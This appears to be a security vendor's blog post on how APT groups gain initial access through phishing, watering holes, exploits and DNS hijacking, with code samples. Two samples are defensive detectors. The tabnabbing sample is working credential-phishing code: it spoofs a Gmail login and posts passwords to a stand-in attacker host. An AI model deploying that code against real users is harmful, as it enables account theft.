Computer systems can be compromised in many different ways, from sophisticated attacks on network components to technically primitive techniques such as business email compromise. In this post we analyze the penetration tactics used by the most dangerous hacker groups: Lazarus, Pawn Storm, Cobalt, Silence and MoneyTaker.
Besides how well a group's members have mastered a tool, one of the most important criteria for choosing it is effectiveness. Modern cyber attacks are complex, multi-stage operations that take a lot of time and serious financial resources to carry out. If the initial penetration fails, all of the preparatory work and expense is wasted. The penetration tactics used by the leading groups can therefore be regarded as the most effective ones.
The following tactics stand out:
- All types of phishing: classic, targeted (spear phishing), phishing via social networks, tabnabbing;
- Supply chain attacks;
- Watering hole attacks;
- Exploitation of vulnerabilities in network equipment and operating systems;
- DNS interception.
None of these methods is new, but each group adds its own twist, turning a merely effective tactic into an armor-piercing round, or elegantly combines several techniques to slip past a company's defenses.
Phishing
In its simplest form, phishing is an ordinary email containing a malicious attachment or link. The text is written to persuade the recipient to do what the sender needs: open the attachment, or follow the link to "change a password".
Emails that appear to come from colleagues or managers are more credible than messages from strangers, especially when their layout matches the company's house style. For this reason, the preparatory phase of a phishing campaign necessarily includes gathering information about the organization's structure, a list of employees and their email addresses, and genuine emails from which design elements can be copied.
One of the groups uses ordinary phishing for initial access, with one nuance: its campaigns always include a test phase in which harmless emails are sent to check that the collected address database is still current. Sending the malicious payload only to the verified recipients raises the effectiveness of the attack.
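The "probe wave, then payload wave" pattern just described leaves a trace in mail-gateway logs that a SOC can look for. The following is an added example (not code from the original post or from any of the groups it discusses): a heuristic that flags sender domains which first sent harmless mail to several of your recipients and later sent those same recipients attachments or links. The log format and the log lines are constructed for illustration; the thresholds are assumptions to tune for your own mail volume.

```javascript
// Constructed mail-gateway log: "epoch_seconds sender recipient attachment_count url_count".
const SAMPLE_LOG = [
  "1700000000 hr@corp-partner.example alice@target.example 0 0",
  "1700000005 hr@corp-partner.example bob@target.example 0 0",
  "1700000010 hr@corp-partner.example carol@target.example 0 0",
  "1700000020 hr@corp-partner.example dave@target.example 0 0",
  "1700000030 newsletter@vendor.example alice@target.example 0 1",
  "1700172800 hr@corp-partner.example alice@target.example 1 0", // two days later
  "1700172805 hr@corp-partner.example bob@target.example 1 1",
  "1700172810 hr@corp-partner.example carol@target.example 1 0",
];

// Parse one log line. A message counts as "weaponized" if it carries any attachment or URL.
function parseLine(line) {
  const [ts, sender, rcpt, att, urls] = line.trim().split(/\s+/);
  if (!ts || !sender || !rcpt) throw new Error(`malformed log line: ${line}`);
  return {
    ts: Number(ts),
    sender,
    domain: sender.split("@")[1].toLowerCase(),
    rcpt: rcpt.toLowerCase(),
    weaponized: Number(att) > 0 || Number(urls) > 0,
  };
}

// Flag sender domains where a benign "probe" wave reached at least minRecipients
// distinct recipients before a weaponized message arrived for one of those recipients
// within maxGapSec. Returns one hit per (domain, recipient) pair.
function findProbeThenPayload(lines, { minRecipients = 3, maxGapSec = 14 * 86400 } = {}) {
  const byDomain = new Map();
  for (const m of lines.map(parseLine)) {
    if (!byDomain.has(m.domain)) byDomain.set(m.domain, []);
    byDomain.get(m.domain).push(m);
  }
  const hits = [];
  for (const [domain, msgs] of byDomain) {
    msgs.sort((a, b) => a.ts - b.ts);
    const probed = new Map(); // recipient -> time of first benign message from this domain
    for (const m of msgs) {
      if (!m.weaponized) {
        if (!probed.has(m.rcpt)) probed.set(m.rcpt, m.ts);
        continue;
      }
      const t0 = probed.get(m.rcpt);
      if (t0 !== undefined && probed.size >= minRecipients && m.ts - t0 <= maxGapSec) {
        hits.push({ domain, rcpt: m.rcpt, probeTs: t0, payloadTs: m.ts });
      }
    }
  }
  return hits;
}

// Stand-alone run: prints the hits for the constructed log.
console.log(findProbeThenPayload(SAMPLE_LOG));
```

Legitimate senders (a newsletter that starts adding links, a partner's HR department) produce the same shape, so treat a hit as an enrichment for triage of the later messages, not as a blocking rule.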
The Pawn Storm group also uses phishing mailings, adding authority as an amplifier to make them more effective. The preparatory phase of its campaigns therefore includes what is known as high-credential phishing: the theft of accounts belonging to senior people. Having collected enough such accounts at the target organization, Pawn Storm sends mail on behalf of those individuals, "charged" with a payload that secures the actual objective.
Pawn Storm (also tracked as Fancy Bear) has another, less well-known trick in its arsenal: replacing a legitimate site with a phishing page inside an already open browser tab, known as tabnabbing, described by Aza Raskin of Mozilla in 2010. The attack proceeds as follows:
- the victim is lured to a harmless-looking site that is controlled by the attacker;
- a script on the site monitors the victim's behaviour: as soon as the victim switches to another tab, or has been inactive for a long time, the page content is replaced with the login page of a webmail or social network service, and the favicon is replaced with that service's icon (Gmail, Facebook, etc.);
- on returning to the tab, the victim finds that she has apparently been "logged out" and, suspecting nothing, enters her credentials;
- the script sends the login and password to the attacker and then redirects the victim to the real service, which she never actually logged out of, so nothing looks wrong.
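The mechanics of the four steps above, as an added example (this is illustrative code written for this page, not code from the original post or from Pawn Storm). The decision of when to flip the page is a small pure state machine so it can be exercised offline; the browser wiring at the bottom runs only when a DOM exists. The titles, icon URL, exfiltration URL and the idle timeout are constructed placeholders and assumptions.

```javascript
const IDLE_MS = 5 * 60 * 1000; // assumption: flip after five minutes without input

// What the tab pretends to be after the flip. All values are constructed placeholders.
const SPOOF = {
  title: "Sign in - Gmail",
  favicon: "https://attacker.invalid/gmail.ico",
  exfil: "https://attacker.invalid/collect", // where the submitted form goes
  realService: "https://mail.google.com/",   // where the server redirects afterwards
};

// State: { swapped, hidden, lastActivity }. Events: activity, hidden, visible, tick.
// The page flips at most once: when the tab is hidden or the user has been idle.
function nextState(state, event) {
  const s = { ...state };
  if (event.type === "activity") s.lastActivity = event.at;
  else if (event.type === "hidden") s.hidden = true;
  else if (event.type === "visible") s.hidden = false;
  else if (event.type === "tick" && !s.swapped &&
           (s.hidden || event.at - s.lastActivity >= IDLE_MS)) s.swapped = true;
  return s;
}

// Rewrite the page. `view` exposes setTitle/setFavicon/setBody so the same code drives
// a real document (below) or a stub in tests.
function applySwap(view) {
  view.setTitle(SPOOF.title);
  view.setFavicon(SPOOF.favicon);
  view.setBody(
    `<form id="login" method="post" action="${SPOOF.exfil}">` +
    `<input name="email" placeholder="Email">` +
    `<input name="password" type="password" placeholder="Password">` +
    `<button>Next</button></form>`
  );
}

// Browser wiring: executed only inside a real page, never under Node.
if (typeof document !== "undefined" && typeof window !== "undefined") {
  const view = {
    setTitle: (t) => { document.title = t; },
    setFavicon: (href) => {
      let link = document.querySelector("link[rel~='icon']");
      if (!link) {
        link = document.createElement("link");
        link.rel = "icon";
        document.head.appendChild(link);
      }
      link.href = href;
    },
    setBody: (html) => { document.body.innerHTML = html; },
  };
  let state = { swapped: false, hidden: false, lastActivity: Date.now() };
  const step = (event) => {
    const next = nextState(state, event);
    if (next.swapped && !state.swapped) applySwap(view);
    state = next;
  };
  ["mousemove", "keydown", "scroll"].forEach((name) =>
    window.addEventListener(name, () => step({ type: "activity", at: Date.now() })));
  document.addEventListener("visibilitychange", () =>
    step({ type: document.hidden ? "hidden" : "visible" }));
  setInterval(() => step({ type: "tick", at: Date.now() }), 1000);
}
```

The last step of the attack, forwarding the victim to the real service, is done server-side: the handler at the exfiltration URL stores the credentials and answers with a redirect to the real service, where the victim's existing session is still valid. Two things break this attack in practice: the address bar still shows the attacker's domain, and a password manager bound to the real origin will not autofill on it.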
Lazarus does not waste effort on small fry, preferring precisely targeted strikes. Its weapons are spear phishing by email and via social networks. Having picked an employee of the target company who suits their purposes, the attackers study his social network profiles and then strike up a correspondence with him, usually opening with an attractive job offer. Using social engineering, they persuade him, under the guise of something important, to download malware and run it on his computer.
The MoneyTaker team, which specializes in banks, runs phishing campaigns in the name of other banks, the central bank, the finance ministry and other finance-related organizations. By copying the templates of the relevant institutions, they give their emails the necessary and sufficient degree of credibility for a successful attack.
Watering Hole Attack
A watering hole attack is one of Lazarus's favourite tactics. The idea is to compromise legitimate sites that employees of the target organization visit frequently. For bank employees, such resources would be the central bank's website, the finance ministry's site and industry portals. Once a site is hacked, hacking tools are planted on it disguised as useful content. Visitors download these programs to their computers and thereby give the attackers access to the network.
Sites hacked by Lazarus include the Polish Financial Supervision Authority (KNF), the Banco de la República Oriental del Uruguay and Mexico's National Banking and Securities Commission (CNBV). The attackers exploited vulnerabilities in Liferay and JBoss to compromise the sites.
OS and network hardware vulnerabilities
Exploiting vulnerabilities in operating systems and network equipment gives significant advantages, but it demands professional knowledge and skills. Using exploit kits without a deep understanding of how they work quickly squanders any initial success: the attackers get in, but cannot do anything with the access.
Vulnerability exploitation is routine for MoneyTaker, Lazarus and Pawn Storm. The first two mainly use known bugs in the firmware of network equipment to bring their own server into the company's network over a VPN and run further operations through it. Pawn Storm's arsenal, however, includes dangerous zero-day vulnerabilities for which no patches exist, and it also scans for systems with known, unpatched vulnerabilities.
DNS interception
This is a family of attacks we have recorded only with Pawn Storm. The other well-known groups usually confine themselves to phishing plus two or three alternative methods.
Pawn Storm compromises DNS at several levels. In one case, the group stole a company's credentials for its DNS provider's control panel and pointed the domain's MX records at its own server, gaining full access to the company's correspondence. The malicious server accepted all mail for the target company and forwarded it on to the real mail servers while keeping copies, so the attackers could step into any conversation at any moment and get the result they wanted without being noticed.
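The MX hijack described above is easy to detect if someone is actually comparing the records the Internet sees with the records the mail team approved. The following is an added example (not from the original post, and not describing any real incident): it parses a resolver's MX answer and reports hosts outside the baseline, missing legitimate hosts, and whether the host that now wins delivery is unapproved. The baseline and the "observed" record set are constructed; nothing is queried live.

```javascript
// The MX hosts the mail team approved (constructed).
const BASELINE_MX = ["mx1.target.example", "mx2.target.example"];

// What a resolver returned after a hypothetical hijack (constructed). The new host has
// the lowest preference value, so it receives all inbound mail first and relays it on.
const OBSERVED_MX = `
target.example. 300 IN MX 5 relay.attacker.invalid.
target.example. 300 IN MX 10 mx1.target.example.
target.example. 300 IN MX 20 mx2.target.example.
`;

// Parse MX records in either full dig format ("name ttl IN MX pref host.") or the
// "dig +short" format ("pref host."): the preference and host are the last two fields.
function parseMx(text) {
  return text
    .split("\n")
    .map((l) => l.trim())
    .filter((l) => l.length > 0)
    .map((l) => {
      const f = l.split(/\s+/);
      const pref = Number(f[f.length - 2]);
      const host = f[f.length - 1];
      if (f.length < 2 || Number.isNaN(pref) || !host) throw new Error(`not an MX record: ${l}`);
      return { pref, host: host.replace(/\.$/, "").toLowerCase() };
    });
}

// Compare observed records with the baseline. The lowest preference wins delivery, so an
// unapproved host with the lowest pref means all mail is diverted, not just a share of it.
function checkMx(observedText, baseline) {
  const records = parseMx(observedText).sort((a, b) => a.pref - b.pref);
  const approved = new Set(baseline.map((h) => h.toLowerCase()));
  const unapproved = records.filter((r) => !approved.has(r.host)).map((r) => r.host);
  const missing = [...approved].filter((h) => !records.some((r) => r.host === h));
  const primary = records.length > 0 ? records[0].host : null;
  return {
    ok: unapproved.length === 0 && missing.length === 0,
    primary,
    primaryDiverted: primary !== null && !approved.has(primary),
    unapproved,
    missing,
  };
}

// Stand-alone run against the constructed records.
console.log(checkMx(OBSERVED_MX, BASELINE_MX));
```

In production, feed the function the output of a query made from outside your own resolvers (for example `dig +short MX target.example @1.1.1.1`), since an attacker who controls the authoritative zone controls what every resolver sees; run it on a schedule and alert on any `ok: false`. The same comparison should be applied to NS records, because the registrar-level takeover described next changes those first.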
Another form of compromise was taking complete control of a DNS registrar's servers. In many countries there are only a handful of registrars, so seizing control of the largest of them gave almost unlimited scope for inserting themselves into the communications of most public and private organizations, for phishing and for other kinds of influence.
Phishing is popular not only with script kiddies renting access to criminal services such as Phishing-as-a-Service or Extortion-as-a-Service. Its effectiveness and relative cheapness have made it the main, and sometimes the only, weapon of the most dangerous groups. The wealth of ways to use it plays into the criminals' hands: most protective solutions let a business email compromise through, and the credulity and inattention of users remain a reliable foundation for fraud.
Protecting computer systems and network equipment, together with the timely installation of security updates, is undoubtedly important, but given how heavily cybercriminals rely on these tactics, measures against the human factor come first.
Credentials intercepted from a senior person's mailbox let criminals steal especially sensitive information and then use both the mailbox and that information for a multi-stage attack. Yet basic awareness training and the use of MFA would deny them this opportunity.
Defensive systems are not standing still either: they detect malicious activity with artificial intelligence, deep learning and neural networks. Many companies are developing solutions of this class, and we too offer our customers protection against sophisticated BEC attacks based on specially trained artificial intelligence. Using such tools together with training employees in safe behaviour will allow them to withstand attacks even by the most technically skilled groups.